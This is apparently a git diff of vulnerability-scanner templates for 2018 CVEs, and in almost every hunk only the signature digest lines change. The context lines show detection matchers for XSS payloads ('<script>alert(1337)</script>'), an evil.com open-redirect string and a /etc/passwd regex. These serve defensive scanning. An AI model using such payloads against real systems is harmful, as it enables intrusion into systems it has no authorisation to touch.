- -# digest: 4a0a0047304502203121bd67916efe4932caddb8ae716740f3a49771688260a4f9bd9c2ed9be0879022100998468476164b79063188e149ba999a0bc7ca1ba4f04818af8e5e264a8b32663:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022043d0f5d48c551078341df23873208ee4f5cb95bc169b1d233bde069e617395f10220309835de1e526f9b5c6c882e3d7a43627ad4a7f0ee769fa5b6dbc1ac1f6b9154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index ca3a94ac96..3b3a861178 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -38,5 +38,4 @@ http: part: body words: - '{{md5(num)}}' - -# digest: 490a00463044022023f409b2349b8aa1746c778f28125b0415bb73263e54d6c6ba8b2af14c5e75ec0220293d121e63d57571915639fb5139e8c112c2a08b2e412f71f1890e8e1ce7ec15:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022001f330fdbe10fe296bf6b16985ca8f6457b0b4b66d784295de5e491d4e3cd0e102201f70a8bff9a3361e68ba2f6e0441030def774d6df2b4a3eaf1fdbd1cc2748d3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 7f0962cabd..0260a92d99 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -40,5 +40,4 @@ http: words: - "self.location = 'http://evil.com'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" - -# digest: 4a0a00473045022019e15dd3f739d5a93a54ae666a7eb5a9d8b59e3f3f068d0add83cde15c316651022100a0ee9ee0b7e996d83341d69c920a9fb1ab27f06626edb227d9d3b366fc797130:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201e2b938447f35236c53b03d3ba20c75fb49a3163175e579c8d05a1f93826bfbf022061f6836e4b0c18d4cb3842bae323e39832c0a034c39844fa892c8cba4bc8a31b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index 961eae2e94..1ef4ffb3ff 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009edbb45a93d759362605c22f4dc78cb1c64e01ff256eebbdfa6f36b15ed0955a022013d0c7fa0789c63ad9d7914b951f421d75ce293a8e91908a01daab780e40bc85:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022012d52b6626a7493982f0c7516b1d8fd364a47dd5504f7d27d9ca77a48f02c465022030f8e8fede14c36b3568535b4ffa1d46a9aaa429462da4e178cca75793fbb2fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 6d5b3587eb..72829e1691 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -41,5 +41,4 @@ http: - 'contains(set_cookie, "_icl_current_admin_language")' - 'contains(body, "\"><script>alert(0);</script>")' condition: and - -# digest: 4b0a00483046022100ae14a0041267cedf6d1eb3daaecb0bebb886860e2742fc445f234a14c38b390d022100c90fc209e4c921153186de4c0d544440a936b6ea9cff6fd6865c747ef55fe823:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022024af2c4c6c6b8270348b48f386e521664a15cc6e48a0f4cf2eec00c50ee0ad15022100fbbc4e15fdbea2d5a20a31d50223b7d4589f920a923c553a7861128e17fbae70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 795055fca8..c4ba06d5bf 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e515c3671e3c9af517d7bdc17d96159c393bae974cdce40fe36973e96212fba8022100918d668446b8ac359105ddb09ef05a2b9dbce78e8390839dca26d6f94193b752:922c64590222798bb761d5b6d8e72950 +# digest: 480a00453043021f6425a7d3d80db1549a8140c5a371350359c995e0fbf310db0bfd0ea748747f022055485e9067846b43eea352fae1e00f8bded413067ce30e2aa33d9f255b02cb4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index bf5630357f..0a7e81b124 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201d30aa28763e51fa271180a27f15dc6d4569fe3bc07a5507e1935a33951b13af022016154011ff26d26173a9289c4a9814ee3ccf467d9bb46922d1ab4ea9d0db2449:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d58fce7ffb54e3bca0b1ccae7d8dfce8d743abd7d3435324750b09a1cea606850220347fd010289bbc1859657a66e6d555fd01c6bc34bf48e16e6c42b717f6c9c411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index c219a102dc..194f192fee 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200be5dae1100a0e27bdcf2a0bc9a33fc4d7f668c3f7ea3ece0e331158ece29a1d022100cb9919616cfcf1d1ff3cc6548ce1956d0bd9e5781181da3be5fa0320ecbada77:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ddfe557dbf8d6dc52f638ef3fbf21bd87f411450389b93157d9f7dcfd1fc42e20220154945d1b89858012a63fafc28d1c89a82e039244f0cd25a3340fb38e5e1d67a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index 8c8ebf435d..ca0653d993 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022059001b82631ef260374e56f7cc5cabe89f0a2f4b99ea2dd535978de05ef1b971022100ce3eae2ce9555b484963d02969ab3bc4aa247a27f9723c12898639e4f8c0d40d:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202ef566d31253093ccf8d41e8154d5780dac8a74c8dc642849fd55309ffc18e48022065053e6a22e079a80657b2e7405c1172583c0b5b1ebbee7e1e01366e586caec1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 9bcc635e3a..203b440eff 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a7834455f4f196739a778578e51cb984d70d69936cc90a5ae9b4007cbb265075022100f00b7967d964e0822fe812d6b0d40a46ca1556b765ef67bf9588c2127427d112:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100daa0da98ae23c82f54b32445c34f875c2b196f0d0dcfa100a0d1de13e8fcdd84022100b3a99b79f7bd8d806ebf7785b2e84a96dbcb9243fff0f9389632f416498bb5ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index 379460b663..da4dfbab0a 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207aa70be18e2e518dfb5a6b8058f045540191516a01ab39c03ded16900d7045d1022100c7a725c3bb5a2ec32c0f3b59d9ab663ae56985fc0b87fa2ecb3f7a45b8e9e798:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e436bbbddb90e2e5c50661b8f42ee16dc9c4cc89996ad9dca8b632cc0b5cd3c4022100c5ee9b6aac04366893a89eb35bbae1713b079943bfe195dcb587740d1483a0a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index 4a80069ca0..1d46aa943f 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200cfd615ea861ee2884807ca5ae8aadc6deb63cfe2ce82515d53dcbe161eb5cdf02206b9e066d5c6e2629cc925d028a3931829aa2554a979de14b858ac24ed80083e1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022047eade9d5d1789268616c2bb9279f9990af97cd6159bb08a570e625c72c00b9d022100b370ed359ca3dd6d6d85eeadd7011af9112fd2e5f3823c5e6bbadf37ba37ef23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index 8d8d465ef5..c53d61f353 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -41,5 +41,4 @@ http: - type: dsl dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "<meta name=\"author\" content=\"Gogs\" />")' - -# digest: 490a00463044022030d42362bbf6e8fcbbb9f4d73810afcbc35d86493cfd09dbdf049d4073fb924b0220204944fb9038c7801bd89ae05f662329d028239a29e794e20ed81240fa23bb1b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b19c8b74cb09be09b97ba4f10c08def739c3a799ac244705eae6cffec45074e402210093e1a481283c75a9e92c2e90dbde0b7876476144f368891edda97551e7f89b6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index 22eaa9a4fd..e2e865e2ff 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008675d11a4a42f3a95fa20355ad9da8770dd6ef7c716e91d55fe34d8190ce972e02207e51fdc1ef9ebe3fc8b2c1369e252ea0b2f774589f3892d93f10f518edc65877:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205b36e3bfb7a3af1b35ce3990daa5db37a62f37bca06d7bb6b7349ab53fc4780402200c9ef7634fc7cf219da6b408835432d4a8705d5a3a6bfaea0d87becc7d4531d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 8d10507adf..4a3c56d84b 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220682d0df20f3f0332ac5b82382312d430111ab802c55726fe42ed6d4d0975c48a0220230f0a34a49547e921c5fe63402f87728e005c7beb48ea1521f1ca29a88177cc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220724b0fbbc29c1ca26f6cc234f1bbc02bc667d6529df81315956d19b46c5b2c9e0221009735401594775d4912459836084569244ecf2413e0ed1b0d9c27e2cda4cd1e33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 81aedf49a5..f82bf54c81 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -60,5 +60,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b9e3320f4254d628440f2760322e1b3f0fff1ea4bf0d9b4cc67d23a43e930d4a02210083aba677c21b000ed059acb73ddce8d20af808c592fd2a2cf6ac95ac99c1b2b2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ab39230dd06de4d30d8ee69324c5cbc090d9ed856389e763af6aa34b41479986022100d47e8e48e921aba29bcb22a8597bd4a6847845f7d4280d56708f334bab890cdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index 132353abd6..ad390fb4dd 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -46,5 +46,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 4a0a00473045022100b7a7452035ec8dbeb28ff8374d99755c3b92823e9d45fe06885830934b59c0b202202bff8a473066e9a2fe879fe9babc1a287bbd903d7ab8c3e98e16a1fd553cf567:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b11a92d0630951869266cf6835960f98df914e3be713701c45ab70349a2aa592022059919bbb1beeadbb4c067e5b09368cb9de0fa83fbdbf8641a989b2a7bb95dca7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index cf56ec065c..686a38d142 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022057adae5166b74c9c6e2285c2c97ef5d1101d445479e6ece1c288902b2ee0be4b022100ad78a0524cb1db54a368b2f9493e70bdff443f8b7e4532204e6e6741c15a663b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210090b7c4edd4c127a79d86dc4abaf904d1824c80ea71d105ca09e9a2e6cb1828e5022100cb323237b584002fee5d16cf0f31b5ab2ca6ffbb74658eaa2d5d6078456a54a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index fd04c818c6..76efacdad1 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200741498d89047b36a0ebdcfcc23b86c4f1dfed9ce6610cc1d89c450a03bb16c0022004a55129bd0716f2e30db0f0709bde89b7a7cc9fb43854a8ee76d97d1a346e5b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009d23626451d93abf5d127affb5e49d4db8262d55e07688f0aef5db9e2a498059022100f367971c1eaae2e805040f31cc11d7a27278eca13c5d2f96f4e414ee3b94bc83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index 1fc3dacff8..b5bee9a705 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -34,5 +34,4 @@ http: part: body words: - "<script>alert(1337)</script><!--" - -# digest: 4a0a00473045022100e684e95cb76ec5f0fb58dc57cc7e8cc8bd6b43d1216c16eb83789bead024ef36022001e9b6cc4646ceef6068117b41cd933b59c7c5d75236a3071b7e7bb4e5b70487:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e67066f8d4d32131889474479b1d88c1c8574989eb95645d6e7ba947a6a2e223022100903170539c1022bc0bbd5195ff5c117c3941b87c08bf11620c090e6ce851c146:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml index 2f079573c5..5105518497 100644 --- a/http/cves/2018/CVE-2018-19458.yaml +++ b/http/cves/2018/CVE-2018-19458.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d8a6d121542aafb9cc5b2949d6f71b1ad3eb402791d26464dc3a74a104cfbb1c022100d9025737d4c8347e94cf446c1b7bc710f3c31240f09571bd94d23c6e5e229037:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fa15228a06fc820cb83b9d7791da1225dd9f040c669dc769ed12470ed99aa49c022100f99cc257fe0523b17bcf57c9cda1593134581a0c11fcf621d9f379e9c64b341f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index be82f2736f..119b0e5d8f 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -56,5 +56,4 @@ http: - 'contains(header_3, "text/html")' - "contains(body_3, '>')" condition: and - -# digest: 490a0046304402204303535a98ea38d1c014089b858fb9e64f5a146852cb697b4e6d8aa7fbb2e0b902202a6040607067b9d5b3c9f8e555edec620e1a35101312608994a2e556febcb56f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a748f478b6806210fe2a3a5aeb3f2d4ab94910ca9876d56621513eecd1b4990702204e42e025be2ba1d2b071882d5d36f4ed8337c82cd25964b6200f6bfab7ff235c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml index 008dc83cf6..f4ca5480cd 100644 --- a/http/cves/2018/CVE-2018-19751.yaml +++ b/http/cves/2018/CVE-2018-19751.yaml @@ -64,5 +64,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203993738c81c3fcbb72d299e7d183d06283c0c9a0f2353af00e9ef17abdc65d93022100d114b311330991c19be3c4d233fb814c889d63bc7eb03c670e00ea51a3d7fc97:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009b7da1564aea86b1d81068de58936dfc6cc17b75d60f692553693b56ffab5def022100a7344fcc4bf9d5de92903b001c9936e03143cd9a0c650bc71e52b70cb65c0be6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index 816237eeef..9247474b99 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml @@ -64,5 +64,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100dadc6cb08a1ddb34394e2d16d83aff0c907df57a405b58a124aa32d06a8e5e0c022100c5071c7a6545fccde2fd212fc20b85365073fc9f2b2f563e5c1440980f4d8c2d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206cd4fd38a97662af1d818af65a6173bd5a57de72faf3ae2d9baee4346a4c2e92022100dcf52f58138a15ac1a09bef0c53bc364d7ae6240b0b0ca1cc2ccd2094dbbc7eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index 1b656edcf7..5bfecaac94 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009851005d17c408eafa0cbc3a40867c4d15f9aa8af6bd84f656907749921a2f580220162d870d0b7612c541b3d3fceb3eb25b7072ba4b4141b7388a6ea6d2587cfd90:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022000c39e2f6da1a99a16580fb82dc945bbf74ad4880595e1619e36bbd750ba6f5e0221009e74f917dbb7b1a813529432bf89489a64dced0e85a9498fc3dde0e02db68bc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml index 8c9844c0f2..7b137c0b99 100644 --- a/http/cves/2018/CVE-2018-19877.yaml +++ b/http/cves/2018/CVE-2018-19877.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008507c3d7bd5dbadc2d3f370f9c2bda1a8c75f4493326a8217e6d7521a8a82e04022100808a963f9bae9ab29e811ddb177f316eb1a5773e9f6705c99e96b4934000e92e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207df94ad3d560bfb538d185c2eaf666d6b5b6b08908edc55c8f587ce4dde2e6ca022100f9b26a7fdc0c382bdb12212f73c580831a2cebb49a4f5220f44d77da65bcc012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19892.yaml b/http/cves/2018/CVE-2018-19892.yaml index 6a031d4612..706c648618 100644 --- a/http/cves/2018/CVE-2018-19892.yaml +++ b/http/cves/2018/CVE-2018-19892.yaml @@ -64,5 +64,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c369bda547c17130c6e463d876e16543cfcdc13cf35dd54fdc5ad3444d84d4f8022100cecd3e329cea5fb1187d13385c97f0ffb18271cf0af284953dd1c956508a9dc9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200d7186e53785e3b75b90a5fa00b4191178f569578409db67d8a8eb6df5cdfb9d022100cf2796dc33ec90e7cf91cfe7c3d6f7dc4d5be6c67cfec626e6eb2224faf75221:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index 834f502fa8..7bf2f71637 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -56,5 +56,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and - -# digest: 4a0a0047304502201e5b0dd6cc11c630a07751f0b48a3a53ae37e93b366fe3d08c2b64ffebc3c5fb022100b1c53fdca5317d00415b82906bf110a3a2692b6446021aa198262e53628b013e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210089b84a408fb1fcf8ae193184860bd91c224cff9c79aa8da676c421516c3009f1022100e1963aa839b8753ca1d125dd6a3f59727c32d2e648daaceba8035d3565924ef3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index 014f55d303..a6d3419f05 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -56,5 +56,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and - -# digest: 4a0a0047304502202c3bf95e045389f2e545f7d308a3c9aabf232f431136df7067b7a833eeacb127022100f875f592af3ae2915c9194d460c081b8e1568f3489fdfde09d577468c8f121fc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022009ccef64d9dba12a4547e44a16af8c469c8ad9763e239b030881191951b235a9022100feab269f9f22a5b1da87eae1920a1d7e3d36ba4a74fcfa7bbf7fad99951fdc1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index c47fcf5793..af6d045ae0 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -56,5 +56,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and - -# digest: 4a0a00473045022100f9f08e735b064b2342c91b29caa501df45d4fb90c3eea036837abd098b48a8ca022028b9497caa152877d60e3bc25a4a68066184cd8901128f569ec82e87ecb3fa0e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200ca849f7b04922365606eb699c13606fa930855596a7a792892586b6275db50b022010bae73c45d293007d65ec4bccf378e9f524b250337d07bda4086580d6d3bd3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index 18527650a8..abb93d7b6d 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml @@ -56,5 +56,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and - -# digest: 4b0a00483046022100b52340f7815408a446a43d4581d548967f295e57bcd7685e0866d83ce173eb9a022100f19d19a6cc7c50d9a3a81ee25007cfa26086947250eb03ac93e1dfd5aae14f02:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b000a59a19ec168f9abddf8f7f4b0899f00cb669c0225280bd5406995a0fcda7022100fd8d22850de1f0cbf5eafac2cc15760ef81fa474d39dc5cad3d948c6ddb5aebe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml index 8f7903fc0a..13d4247abd 100644 --- a/http/cves/2018/CVE-2018-20011.yaml +++ b/http/cves/2018/CVE-2018-20011.yaml @@ -56,5 +56,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and - -# digest: 4a0a00473045022039952d4c7d4a945bb2a64146ba4d3b798a93c814cec184b2121e4cc8fe6d59de022100d5f56c7dbda91f6bc815ff8344a6d6327f249287245a7844d3cf9fb5535e08a7:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203184351178caa88deb692d304f81318fca63cac839019ee835e9182b41ff7a140220365744bd67f121fcbd0ff9f5a13472dab497f758c3a8c76a51f7276a1ac8424c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index c084dae21a..cd29b385e3 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d2698d6af0d0a917ffe05bc87a32b76ee7395ae235a644f6b0c960dfa8926329022100fc0d45027e620d874b13205deeee4da90229410aaab3b6371fe59dc51615337e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220148c45606e4f24c6df5b3f24fea02de5ab8ec869223dc3f73a1ca3e80fd56909022100af7f7934f4b7a0348bd475a5b64d40f41b513d95d7eace826cf6c51cc7276f1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml index 8345e0cf06..dca7cc4e85 100644 --- a/http/cves/2018/CVE-2018-20463.yaml +++ b/http/cves/2018/CVE-2018-20463.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203464d44b0bc51d53347b8aa3d1ebc61ca1b2c3d65f9672ce47943e6cf3515ff6022055b5f9a4f809ac45ad6989f532133a1d8373e874c9998bb091c8be58a141e12e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200d2b755c29a893df93564d486f711c87e203712327e6ea4163b518d7836f5acb022079e9bc18f1c324be44f2b355d0cbfbb398cf3d4ee4cfff85d00eb9b06ef0cf32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index 10e5703f36..69329536c8 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200a58ac1ce0b82184dc2ef6eb0ffadb362dbb75ab9c3ba9ba63a97eceb703cbc002207a6aab89195316558936ecfe0cee7105c1efa8678da9d16853227c9a970b4056:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022044e0774679e6d3c3c398e355b97ac8c7de26393a657024178edaddb93b36104102207fa8e1f95f68af117e2cee10a061ae3a962bd4bbfceb2258089a30bb36ec1f98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index b8fd3c95b2..02e20b25f5 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -80,5 +80,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203c2debace5d663ff95c76dcadb517213ab918afd01ea605371fca32c71787a20022060d8b68b686aecacee47faea0b53617515f9c02d52d891e3bc1805f735fd9818:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206e621beb7d9a28e7b5d8ae606c9595cf86799b445fc0b4165b2de3224009d48702210082781a48ea7ad250c9cb3cdd23c84b12460cbaaf6b1cfaf7ed0ab3e1438ea79a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20608.yaml b/http/cves/2018/CVE-2018-20608.yaml index 2911293d6d..fd5e92c21d 100644 --- a/http/cves/2018/CVE-2018-20608.yaml +++ b/http/cves/2018/CVE-2018-20608.yaml @@ -46,5 +46,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body - -# digest: 490a00463044022005afa0a6cfd514866683a4efcb9452c941a035c3d5fc6cef36a0e709c6f45663022062f8c1c4ee00824e4fd70db73bff3cb452b6c08614ad35fe01aa4ec89523d389:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a13d57f800370196018e9ec629bb99d7492dfaaaf89f50bd67fa4ff25333fb2302204e8b3e5e8e6e5072acda439e18956ad0bd672167b952eff9c12ca75cddb49830:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 